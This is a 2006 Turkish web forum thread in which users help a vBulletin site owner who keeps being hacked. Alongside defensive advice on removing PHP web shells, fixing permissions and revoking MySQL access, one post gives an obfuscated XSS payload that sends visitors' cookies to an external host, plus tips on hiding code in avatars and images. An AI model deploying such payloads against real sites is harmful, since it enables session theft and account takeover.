bir defa bi şekiled ftp ye girdiyseler
php listpath veya phpshell scriptleri atmışlardır çelitli directory lere ordan tekrar tekrar hackleyebilri kendilerine admin yazabilirler vbulletinde,
bunun için vbulletin admin panelden vbulletin dosya sürüm kontrolü yaptır orda vbulletin dosyası olmayan dosylarıda söleyecektir onları sil eyer bilmediğin dosya varsa
bide cpanel iletişim mailini kontrol et deyiştirmişseler ordan tekrar tekrar şifre istetebilirler
yada yine mysql e adamlar kendi ip lerine giriş izni eklemişlerdir
böylece kendi pc sinden senin sitenin sql ine bağlanıp( config.php deki db bilgileri ile) ordan tablolardaki admin lerin şifre hasini kendilerine hazırladıkları bakça bir has ile deyiştirip tekrar admin olabilirler
bunu önlemek için cpanel den adamların eyer mysql e giriş izni varsa onların ip yi sil ve db şifreni deyiş yeniden config.php yi ayarla
bunun dışında klasörlerin chmod larını kontrol et yalnış chmod varsa rahat rahat dosya yükleyip(phplistpath veya phpshell) tekrar admin olup hackleyebilirler
ek olarak
sitende vbulletin dışında kurulu ( sub domain lerdede kurulu olabilir) başka script varsa onların açığı var olabilir
yine server daki bazı yazılımlarda açık olabilir server yazılımlarını güncelle
vs vs vs böyle uzatabilirim daha
VBulletin Açığı
25
●3.026
- 20-07-2006, 12:42:01Holyboy doğru söylüyor.
vB'nin açığı değildir o, sunucunuz php listpath veya phpshell'leri yiyordur büyük ihtimal ile.
r57 ile bir tanedaha dosya vardı bu shell dosyaları ile config.php ye girip mysql kullanıcı adı ve şifresini öğreniyorlar ve diğer shell dosyası ile mysql e bağlanıyorlar. Öğrendikler mysql bilgileri ile sitenin mysql i bağlanıp admin kullanıcısının md5 li şifresini kendi md5'li şifreleri ile değiştitiyorlar. - 20-07-2006, 12:48:57Üyeliği durdurulduArkadaşım modaratör ve admin kullanıcı gruplarını halka acık grup yapmışsın senin konularını admin panelinden değil site üzerinden siliyorlar
ayarlamayı unutmuşsun. Genelde unutulan bişeydir üye olup kontrol panelinden kullanıcı grubu seceneklerinden kendisini mod veya admin yapabilir. ve böylece siler
onu kontrol et - 20-07-2006, 13:52:53Üyeliği durdurulduArkadaşlar teşekkürler önerileriniz için
Hepsini tek tek deneyecek ve gerekli düzenlemeleri yapacağım
Başka fikri olan varsa belirtirse sevinirim
bizimde şüphelendiğimiz buydu zaten. peki bunu nasıl halledebilirim?Alıntı
Hepinize şimdiden teşekkürler
Sağolun - 20-07-2006, 14:05:34Üyeliği durdurulduJs ile alert verdirmek suretiyle cooikeni calabilir.
<B C=">" ''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'s ss=`i=new/**/Image();i.src='http://www.ULusaL.com/cookie/c.php?c='+document.co okie;this.sss=null`style='font-size:0; X="<B ">'</B>
Gene ayni sekilde [b] [i] kodlarin acik ise
<b C=">" onmouseover="alert('ULusaL')" X="<b "> HedeHodo </b>Bu tarzda alert kodunu gelistirirek msjlarina mouse ile gelindiginde cooike calabilir.
Avatar`a kod saklar
Forum a actigi yeni bir konunun icerine kod koyabilir.
Hatta bir adim daha oteye gidip .jpg resminin icin .config ypar .php`ye cevirir (777)
daha zebille yontem war yeterki forum vb veya smf olsun.
engelleyemessin
bir yama yoq benim bildigim 
Belki bende kendi avatarima qoydum ne malum
- 20-07-2006, 14:22:11Üyeliği durdurulduKimin yaptigni biliyorsan engellersin ama adamin kullanabilecegi siteleri engellemek gibi karmasik bisi
basitce boyle bir kod sanirim ama gelistirmek gerek 
<html>
<form target="_blank_ onsubmit"=return ShowFormWarning()" action"=hebelehubele ................................. >
<xembed src="http//www.sanasaldirankisi.com/log.swf" width="1" Height="1">
</xembed>
Birde vb formlarda ise yarar mi bilmiyorum daha denemedim ama ws lerde yariyor.maxat html vs js engellemek
msql daki config.php dosyasini include et. <? include("../xss.php"); gibi
Sayfaya bastirdigin veriyi ogreniyorsun $ulusal degiskeni gibi
Sonra filtreliyorsun hocam $ulusal = securityihtml($text); yani bastirmak istedigimiz degiskeni bu sekilde filtrelersin
oldumu diyede denemek isteren <script>alert(document.cookie)</script gibi bir js ile deneme yapabilirsin.
rep isterim
Nede olsa session`lar silinmiyor.
bir yama yoq benim bildigim 
